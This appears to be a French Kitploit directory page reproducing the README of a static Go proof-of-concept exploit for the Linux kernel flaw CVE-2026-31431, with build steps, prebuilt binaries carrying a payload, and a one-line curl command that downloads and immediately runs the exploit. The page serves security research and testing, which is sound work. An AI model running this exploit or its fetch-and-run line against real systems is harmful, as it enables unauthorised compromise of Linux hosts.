Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Copy-Fail-CVE-2026-31431-Statically-PoC — Preuve de concept statique en Go pour CVE-2026-31431, exploitant Linux AF_ALG et splice(2) pour déclencher la vulnérabilité. Fournit des binaires précompilés pour amd64, arm64 et 386. | Kitploit
Outils/GitHubGitHub/percivalll/copy-fail-cve-2026-31431-statically-poc
Frameworks d'ExploitationAnalyse des VulnérabilitésExploitationDéveloppement de Charges UtilesExploitation de Binaires
GitHubpercivalll/copy-fail-cve-2026-31431-statically-poc

Copy-Fail-CVE-2026-31431-Statically-PoC

Preuve de concept statique en Go pour CVE-2026-31431, exploitant Linux AF_ALG et splice(2) pour déclencher la vulnérabilité. Fournit des binaires précompilés pour amd64, arm64 et 386.

Voir le dépôt
315il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC statique Go pour Copy-Fail CVE-2026-31431

Ce dépôt contient un portage Go de la preuve de concept publique en Python issue de theori-io/copy-fail-CVE-2026-31431.

Le programme est exclusivement destiné à Linux. Il utilise l'interface Linux AF_ALG, les messages de contrôle AEAD et splice(2) pour préserver le comportement de la PoC d'origine tout en produisant un petit binaire Go statique.

Cibles prises en charge

Les versions de publication sont générées pour :

  • linux/amd64
  • linux/arm64
  • linux/386

Chaque binaire intègre un ELF de payload pour la même architecture cible.

Les builds macOS et Windows ne sont volontairement pas publiés, car la PoC dépend d'interfaces noyau spécifiques à Linux.

Téléchargement

Les versions taguées publient des binaires statiques compressés et un manifeste de sommes de contrôle :

  • copy-fail-poc-linux-amd64.tar.gz
  • copy-fail-poc-linux-arm64.tar.gz
  • copy-fail-poc-linux-386.tar.gz
  • SHA256SUMS

Vérifiez un artefact téléchargé avec :

root@kitploit:~
sha256sum -c SHA256SUMS

Compilation locale

Prérequis :

  • Go 1.25 ou plus récent
  • Prise en charge des cibles Linux par la chaîne d'outils Go

Compiler pour l'architecture hôte actuelle :

root@kitploit:~
CGO_ENABLED=0 go build -trimpath -ldflags='-s -w -buildid=' -o copy-fail-poc ./cmd/copy-fail-poc

Compilation croisée pour une cible Linux :

root@kitploit:~
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -trimpath -ldflags='-s -w -buildid=' -o copy-fail-poc-linux-amd64 ./cmd/copy-fail-poc

Les valeurs GOARCH prises en charge sont amd64, arm64 et 386.

Exécuter les tests :

root@kitploit:~
go test ./...
go vet ./...

Les tests ne couvrent que la logique d'assistance non destructive. Ils n'exécutent pas le chemin de déclenchement de la PoC.

Utilisation

Exécutez le binaire sur un système Linux que vous possédez ou pour lequel vous êtes explicitement autorisé à tester :

root@kitploit:~
./copy-fail-poc-linux-*

Téléchargement et exécution en une ligne depuis une version publiée :

root@kitploit:~
sh -c 'set -e; case "$(uname -m)" in x86_64) a=amd64;; aarch64|arm64) a=arm64;; i386|i686) a=386;; *) echo "unsupported arch: $(uname -m)" >&2; exit 1;; esac; curl -fsSL "https://github.com/Percivalll/Copy-Fail-CVE-2026-31431-Statically-PoC/releases/latest/download/copy-fail-poc-linux-${a}.tar.gz" | tar xz; ./copy-fail-poc-linux-${a}'

Le comportement dépend du noyau cible et de la configuration locale du système. Le binaire ne garantit pas une exploitation réussie sur tous les systèmes Linux.

Processus de publication

Le workflow GitHub Actions s'exécute sur les tags correspondant à v* et peut également être lancé manuellement depuis l'onglet Actions.

Créer une version :

root@kitploit:~
git tag v0.1.0
git push origin v0.1.0

Pour les builds par tag, le workflow crée une GitHub Release et téléverse les artefacts Linux ainsi que SHA256SUMS. Pour les exécutions manuelles, les artefacts sont disponibles depuis l'exécution du workflow.

Avis de sécurité

Ce projet est fourni uniquement pour la recherche en sécurité autorisée, la validation défensive et l'examen pédagogique. Ne l'exécutez pas sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test. Vous êtes responsable du respect de toutes les lois, contrats et politiques applicables.

Crédits

  • PoC d'origine : theori-io/copy-fail-CVE-2026-31431
Télécharger l’outil